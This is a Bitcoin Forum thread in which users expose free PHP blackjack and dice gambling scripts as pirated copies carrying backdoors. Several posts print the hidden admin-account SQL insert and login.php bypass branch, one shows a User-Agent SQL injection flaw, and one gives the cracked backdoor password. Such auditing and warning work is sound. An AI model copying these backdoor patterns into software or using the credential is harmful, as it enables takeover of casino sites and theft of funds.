Bitcoin Forum
May 13, 2024, 10:48:53 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: 1 2 3 [All]
  Print  
Author Topic: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts  (Read 6530 times)
felinegambler (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 0


View Profile
December 31, 2014, 07:55:18 AM
 #1

CryptoBlackJack
https://github.com/felinegambler/CryptoBlackJack

CryptoDice
https://github.com/felinegambler/CryptoDice

Both scripts are in good working order and are highly secured, CryptoBlackJack is still a little buggy but I am working on that actively (It would be nice to know what bugs you come across).

Both scripts support all Bitcoin based cryptocurrencies.

if you need help with installation I am more than willing to help you. please email me at felinegambler@gmail.com

Please Read

due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.

Have Fun!
The network tries to produce one block per 10 minutes. It does this by automatically adjusting how difficult it is to produce blocks.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
TechnoBibble
Member
**
Offline Offline

Activity: 179
Merit: 10


View Profile
December 31, 2014, 09:23:03 AM
 #2

CryptoBlackJack
https://github.com/felinegambler/CryptoBlackJack

CryptoDice
https://github.com/felinegambler/CryptoDice

Both scripts are in good working order and are highly secured, CryptoBlackJack is still a little buggy but I am working on that actively (It would be nice to know what bugs you come across).

Both scripts support all Bitcoin based cryptocurrencies.

if you need help with installation I am more than willing to help you. please email me at felinegambler@gmail.com

Please Read

due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.

Have Fun!

Thank You for the new release, I will Audit these scripts when I get home from work tonight.
felinegambler (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 0


View Profile
December 31, 2014, 11:21:48 AM
 #3

Thanks. I can assure you there is nothing hidden. It would be good to have an independent audit of the software.
Muhammed Zakir
Hero Member
*****
Offline Offline

Activity: 560
Merit: 506


I prefer Zakir over Muhammed when mentioning me!


View Profile WWW
December 31, 2014, 11:30:03 AM
 #4

Hello! Can you extract the dice-rolling script from this and send it to me? I can give some BTC if you want. Smiley

   ~~MZ~~

LOBSTER
Hero Member
*****
Offline Offline

Activity: 560
Merit: 500


View Profile
December 31, 2014, 11:32:50 AM
 #5

Can you show some screenshots? Before downloading and installing, I want to see it Cheesy

But it's not the script from Johny1976?
Muhammed Zakir
Hero Member
*****
Offline Offline

Activity: 560
Merit: 506


I prefer Zakir over Muhammed when mentioning me!


View Profile WWW
December 31, 2014, 11:43:59 AM
Last edit: December 31, 2014, 01:19:34 PM by Muhammed Zakir
 #6

But it's not the script from Johny1976?

Johny1976's script isn't free. Anyway, if this script has any portion of Johny's script, I hope you have enough licenses. Smiley

   ~~MZ~~

LOBSTER
Hero Member
*****
Offline Offline

Activity: 560
Merit: 500


View Profile
December 31, 2014, 11:54:21 AM
 #7

Can you show some screenshots? Before downloading and installing, I want to see it Cheesy

You can use Github for demos. They offer making sites for the Github repos.

But it's not the script from Johny1976?

Johny1976's script isn't free. Anyway, if this script has any portion of Johny's script, I hope you have enough licenses. Smiley

   ~~MZ~~

Hi Muhammed,

where can I find the option for the demo?

It can also be a rip-off of Johnys script.
felinegambler (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 0


View Profile
December 31, 2014, 12:01:26 PM
 #8

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.

Anyway... Its now on github for people to share and distribute freely.
Sam the Man
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
December 31, 2014, 12:05:15 PM
 #9

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.
felinegambler (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 0


View Profile
December 31, 2014, 12:09:48 PM
 #10

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Hi, I am working on a couple which will be released in the next week Smiley

Thank You for your positive feedback.
elm
Legendary
*
Offline Offline

Activity: 1050
Merit: 1000


View Profile
December 31, 2014, 12:15:20 PM
 #11

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Hi, I am working on a couple which will be released in the next week Smiley

Thank You for your positive feedback.

I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?

@felinegambler could You do a hold'em script? against payment without a backdoor Smiley
felinegambler (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 0


View Profile
December 31, 2014, 12:19:26 PM
 #12

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Hi, I am working on a couple which will be released in the next week Smiley

Thank You for your positive feedback.

I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?

@felinegambler could You do a hold'em script? against payment without a backdoor Smiley

Yeah of course, Its something a started a while back which I been meaning to finish.

The Backdoors that were in my initial script were from johnny1976 and I didn't notice they were there, I did however promptly remove them. If you are worried get someone to look over the code. To be honest, I wouldn't release this open source for everyone to read if I was going to put backdoors in the code.

I will get to work on the Hold'Em game tonight, As personally its my favorite game.

LOBSTER
Hero Member
*****
Offline Offline

Activity: 560
Merit: 500


View Profile
December 31, 2014, 12:21:19 PM
 #13

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.

Anyway... Its now on github for people to share and distribute freely.

Thanks! Nice work!
Muhammed Zakir
Hero Member
*****
Offline Offline

Activity: 560
Merit: 506


I prefer Zakir over Muhammed when mentioning me!


View Profile WWW
December 31, 2014, 12:21:26 PM
 #14

Hi Muhammed,

where can I find the option for the demo?

It can also be a rip-off of Johnys script.

Sorry! It was meant to OP. OP can setup github links such as brainwallet.github.io . So I just suggested it! Smiley

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.

Anyway... Its now on github for people to share and distribute freely.
Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Can you please post pics like LOBSTER said? And, please reply to my question. Thanks! Smiley

   ~~MZ~~

felinegambler (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 0


View Profile
December 31, 2014, 12:38:14 PM
 #15

Hi Muhammed,

where can I find the option for the demo?

It can also be a rip-off of Johnys script.

Sorry! It was meant to OP. OP can setup github links such as brainwallet.github.io . So I just suggested it! Smiley

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.

Anyway... Its now on github for people to share and distribute freely.
Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Can you please post pics like LOBSTER said? And, please reply to my question. Thanks! Smiley

   ~~MZ~~

Of course, I will get some pics when I am back home tonight and put them on this thread.

Thanks for the github.io link, I will see if I can upload a demo also.
elm
Legendary
*
Offline Offline

Activity: 1050
Merit: 1000


View Profile
December 31, 2014, 12:47:51 PM
 #16

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Hi, I am working on a couple which will be released in the next week Smiley

Thank You for your positive feedback.

I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?

@felinegambler could You do a hold'em script? against payment without a backdoor Smiley

Yeah of course, Its something a started a while back which I been meaning to finish.

The Backdoors that were in my initial script were from johnny1976 and I didn't notice they were there, I did however promptly remove them. If you are worried get someone to look over the code. To be honest, I wouldn't release this open source for everyone to read if I was going to put backdoors in the code.

I will get to work on the Hold'Em game tonight, As personally its my favorite game.



thanks for the good work. may I PM you regarding the holdem? because I have my own holdem idea and would like to know
if You can/would do it and I sure wanna pay for it.
felinegambler (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 0


View Profile
December 31, 2014, 01:13:08 PM
 #17

of course, send me your suggestions. I will see if I can implement them.
felinegambler (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 0


View Profile
December 31, 2014, 01:39:35 PM
 #18

Problem

Whist installing the blackjack game I have noticed a problem with the login, I wouldnt suggest downloading this until I have fixed it as it will allow anyone to connect to your admin panel. If you do decide to download this you can rename your admin panel to something else.
cloverme
Legendary
*
Offline Offline

Activity: 1512
Merit: 1057


SpacePirate.io


View Profile WWW
December 31, 2014, 04:18:06 PM
 #19

I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.

Well, that didn't take long.  At least for the blackjack, this is a pirate copy of johny1976's coinjack.

Install from the OP
Code:
if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }
  $included_=true;
  include __DIR__.'/db_data.php';
 
  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");          
  fwrite(
$db_file,'$conf_c=true;'."\n");          
  fwrite(
$db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite(
$db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite(
$db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite(
$db_file,"?>
");      ?><?php
  fclose
($db_file);

Install from official Coinjack:
Code:
if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }

  $included_=true;
  include __DIR__.'/db_data.php';
 
  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");          
  fwrite(
$db_file,'$conf_c=true;'."\n");          
  fwrite(
$db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite(
$db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite(
$db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite(
$db_file,"?>
");      ?><?php
  fclose
($db_file);
TechnoBibble
Member
**
Offline Offline

Activity: 179
Merit: 10


View Profile
December 31, 2014, 04:24:43 PM
Last edit: December 31, 2014, 04:39:47 PM by TechnoBibble
 #20

I am also in the process of looking through this script, I agree Downloaders beward of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters.

I will post my findings soon.

Backdoor Found

CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.

Code:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
  `id` int(255) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
  `passwd` text COLLATE utf8_unicode_ci NOT NULL,
  `ga_token` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)

Surprise Surprise

if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');
Code:
if (!empty($_POST['ga_playertest'])) {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  } else {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  }

Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?
LOBSTER
Hero Member
*****
Offline Offline

Activity: 560
Merit: 500


View Profile
December 31, 2014, 04:25:46 PM
 #21

I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.

Well, that didn't take long.  At least for the blackjack, this is a pirate copy of johny1976's coinjack.

Install from the OP
Code:
if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }
  $included_=true;
  include __DIR__.'/db_data.php';
 
  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");          
  fwrite(
$db_file,'$conf_c=true;'."\n");          
  fwrite(
$db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite(
$db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite(
$db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite(
$db_file,"?>
");      ?><?php
  fclose
($db_file);

Install from official Coinjack:
Code:
if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }

  $included_=true;
  include __DIR__.'/db_data.php';
 
  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");          
  fwrite(
$db_file,'$conf_c=true;'."\n");          
  fwrite(
$db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite(
$db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite(
$db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite(
$db_file,"?>
");      ?><?php
  fclose
($db_file);

As I said...but he meant that he fixed some bugs.
elm
Legendary
*
Offline Offline

Activity: 1050
Merit: 1000


View Profile
December 31, 2014, 04:29:27 PM
 #22

I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.

are there many open source gambling scripts with backdoors on github?
johny1976
Legendary
*
Offline Offline

Activity: 1135
Merit: 1002

Developer


View Profile
December 31, 2014, 04:31:24 PM
 #23


due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.


And it's also copyrighted. Please stop sharing our scripts for free.

SCAMMER

I recommend everyone not to download this backdoored versions of our software. These are not even the latest versions and contain security bugs.

If you buy full license from us, you'll get free lifetime support + updates. See my signature.
elm
Legendary
*
Offline Offline

Activity: 1050
Merit: 1000


View Profile
December 31, 2014, 04:36:05 PM
 #24

confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?
LOBSTER
Hero Member
*****
Offline Offline

Activity: 560
Merit: 500


View Profile
December 31, 2014, 04:37:25 PM
 #25

confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

So true...best option: develop your own script!
cloverme
Legendary
*
Offline Offline

Activity: 1512
Merit: 1057


SpacePirate.io


View Profile WWW
December 31, 2014, 04:38:13 PM
 #26

As I said...but he meant that he fixed some bugs.

Sorry, I missed your post on it too. I went through some of the code, but not all of it. Since it's a pirate copy, who knows if it has any exploits in there or not, my advice is to avoid the pirate copy and just buy the script from johny if you want it.
LOBSTER
Hero Member
*****
Offline Offline

Activity: 560
Merit: 500


View Profile
December 31, 2014, 04:39:42 PM
 #27

As I said...but he meant that he fixed some bugs.

Sorry, I missed your post on it too. I went through some of the code, but not all of it. Since it's a pirate copy, who knows if it has any exploits in there or not.

At first he should tell us which bugs are in the script and how he fixed it. That would help to trust and retrace.
TechnoBibble
Member
**
Offline Offline

Activity: 179
Merit: 10


View Profile
December 31, 2014, 04:42:12 PM
 #28

For Your Information, I have just found a backdoor in /admin/login.php

Please see this post (https://bitcointalk.org/index.php?topic=908996.msg9994462#msg9994462)
elm
Legendary
*
Offline Offline

Activity: 1050
Merit: 1000


View Profile
December 31, 2014, 04:43:10 PM
 #29

confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

So true...best option: develop your own script!

I cant code Sad( so what should I do?
cloverme
Legendary
*
Offline Offline

Activity: 1512
Merit: 1057


SpacePirate.io


View Profile WWW
December 31, 2014, 04:44:24 PM
 #30


Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?

I do have the licensed game yes, none of that code is in there, so it looks like you found the exploit in scammers attempt.
johny1976
Legendary
*
Offline Offline

Activity: 1135
Merit: 1002

Developer


View Profile
December 31, 2014, 04:44:56 PM
 #31

confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

Just compare his modified admin login script with our original:



(original) https://i.imgur.com/NjX9IW5.png
(backdoored) https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php

This should help you guys make clear who is the scammer here. :-)
cloverme
Legendary
*
Offline Offline

Activity: 1512
Merit: 1057


SpacePirate.io


View Profile WWW
December 31, 2014, 04:47:24 PM
 #32

confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

Just compare his modified admin login script with our original:



(original) https://i.imgur.com/NjX9IW5.png
(backdoored) https://i.imgur.com/NjX9IW5.png

This should help you guys make clear who is the scammer here. :-)

You posted the same image by accident.
johny1976
Legendary
*
Offline Offline

Activity: 1135
Merit: 1002

Developer


View Profile
December 31, 2014, 04:47:43 PM
 #33

confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

Just compare his modified admin login script with our original:



(original) https://i.imgur.com/NjX9IW5.png
(backdoored) https://i.imgur.com/NjX9IW5.png

This should help you guys make clear who is the scammer here. :-)

You posted the same image by accident.

Thank you, corrected.
redsn0w
Legendary
*
Offline Offline

Activity: 1778
Merit: 1042


#Free market


View Profile
December 31, 2014, 04:56:06 PM
 #34

Scam accusation against you : https://bitcointalk.org/index.php?topic=909282.0

 Please try to resolve it ( I've left you a negative trust for only a questio of security , when you will resolve this situation I will remove it).

Thanks for the attention , have a great day .
TechnoBibble
Member
**
Offline Offline

Activity: 179
Merit: 10


View Profile
December 31, 2014, 04:58:21 PM
 #35

I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0

johny1976, Do you have a link to your version that I can put in the solution?
redsn0w
Legendary
*
Offline Offline

Activity: 1778
Merit: 1042


#Free market


View Profile
December 31, 2014, 05:00:08 PM
 #36

I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0
Thanks I've seen it. Now I suggest to leave a negative trust to  the OP ( for a security reason , it will remove when all the situation will be clarified).
johny1976
Legendary
*
Offline Offline

Activity: 1135
Merit: 1002

Developer


View Profile
December 31, 2014, 05:02:01 PM
 #37

I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0

johny1976, Do you have a link to your version that I can put in the solution?

https://bitcointalk.org/index.php?topic=718910.0 - CoinJack
https://bitcointalk.org/index.php?topic=507515.0 - CoinDice

It's also in my signature.

TechnoBibble
Member
**
Offline Offline

Activity: 179
Merit: 10


View Profile
December 31, 2014, 05:06:03 PM
 #38

I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0

johny1976, Do you have a link to your version that I can put in the solution?

https://bitcointalk.org/index.php?topic=718910.0 - CoinJack
https://bitcointalk.org/index.php?topic=507515.0 - CoinDice

It's also in my signature.



lol, did not see in your sig, I tend to ignore them Wink

added to post.
elm
Legendary
*
Offline Offline

Activity: 1050
Merit: 1000


View Profile
December 31, 2014, 05:09:54 PM
 #39

but to  be frank Johnny has the worst support for his Black Jack script IMO please see here
https://bitcointalk.org/index.php?topic=718910.0
LilGhost
Member
**
Offline Offline

Activity: 72
Merit: 10



View Profile
December 31, 2014, 06:07:56 PM
Last edit: December 31, 2014, 08:06:23 PM by LilGhost
 #40

The admin login page is vulnerable to SQL injection.

Code:
mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.



Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first.
MarkMJ
Hero Member
*****
Offline Offline

Activity: 714
Merit: 500


one for one and 1 2 3


View Profile
July 06, 2015, 05:13:47 PM
 #41

Just test the CryptoBlackJack
Have 3 backdoors but good for making a project
Sorry for user that drop this script.

I'm RED and that's GOOD, i will never be GREEN and that's not BAD! there's no one i'd rather be than me.
DEV for cryptocurrency but I HATE forks
elm
Legendary
*
Offline Offline

Activity: 1050
Merit: 1000


View Profile
July 06, 2015, 05:44:14 PM
 #42

Just test the CryptoBlackJack
Have 3 backdoors but good for making a project
Sorry for user that drop this script.

are those 3 backdoors enough to get my coins?
myfirst
Full Member
***
Offline Offline

Activity: 156
Merit: 100


Crypto Currency Developer


View Profile
July 06, 2015, 06:29:34 PM
 #43

The admin login page is vulnerable to SQL injection.

Code:
mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.



Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first.

Is this issue specifically with this pirated copy or with the original as well?
johny1976
Legendary
*
Offline Offline

Activity: 1135
Merit: 1002

Developer


View Profile
July 06, 2015, 08:41:56 PM
 #44

The admin login page is vulnerable to SQL injection.

Code:
mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.



Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first.

Is this issue specifically with this pirated copy or with the original as well?

Only this pirated copy, in our (original) version that is protected.
ca333
Hero Member
*****
Offline Offline

Activity: 520
Merit: 522


Developer - EthicHacker - BTC enthusiast


View Profile
November 11, 2015, 08:02:02 AM
 #45

I am also in the process of looking through this script, I agree Downloaders beward of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters.

I will post my findings soon.

Backdoor Found

CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.

Code:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
  `id` int(255) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
  `passwd` text COLLATE utf8_unicode_ci NOT NULL,
  `ga_token` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)

Surprise Surprise

if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');
Code:
if (!empty($_POST['ga_playertest'])) {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  } else {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  }

Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?

i cracked the md5 hash:

6d2aff483952d904179ca0c8c536a2c7:playertest1

I advice anybody to USE THE ORIGINAL version from johny1976 because the posted scripts have many backdoors and they are pirated copies with NO licence...


this space is available (free) for humanitarian nonprofit organizations - please contact me
Pages: 1 2 3 [All]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!